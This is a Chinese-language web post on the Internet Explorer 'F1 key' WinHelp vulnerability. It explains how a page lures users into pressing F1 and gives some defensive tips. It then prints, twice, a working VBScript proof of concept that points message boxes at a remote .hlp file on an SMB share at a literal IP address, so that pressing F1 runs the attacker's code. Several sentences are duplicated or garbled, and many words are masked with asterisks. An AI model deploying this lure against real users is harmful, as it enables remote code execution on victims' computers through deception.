F1按鍵本來用於快速打開幫助菜單,此時卻變成了***設下的圈套,***利用僞裝的“幫助”程序誘使用戶按下F1鍵後,即可通過該漏洞執行惡意代碼,相當於***把槍對準了網民,卻要由網民自己來扣響扳機。因此,只要不按F1鍵,就能確保該漏洞不被***利用。普通的掛馬***會自動把***下載到電腦裏,而針對“F1按鍵”漏洞的***則需要網民自己按鍵來觸發,但這絕不意味着這個漏洞危害不大。因爲國內有相當比例的網民嚴重缺乏安全意識,如果看到一些網頁彈出抽獎、投票一類的對話框,很可能就會按照提示按下F1鍵,***甚至有可能會不斷彈出對話框來強迫網民就範。此外,上網時如果遇到被提示要按F1鍵而又無法關閉瀏覽器的情況,可以用“任務管理器”來終止IE瀏覽器的進程。
***者可以利用這個安全漏洞執行在運行應用程序的用戶上下文任意代碼。
成功的***會損害可能的應用和底層的計算機。
注意***者必須使用社會工程學,以說服信任用戶按今年F1鍵時,***者的消息框提示他們這樣做。
成功的***會損害可能的應用和底層的計算機。
注意***者必須使用社會工程學,以說服信任用戶按今年F1鍵時,***者的消息框提示他們這樣做。
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
//For i=1 to 2500
// big = big & "\..\"
//Next
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>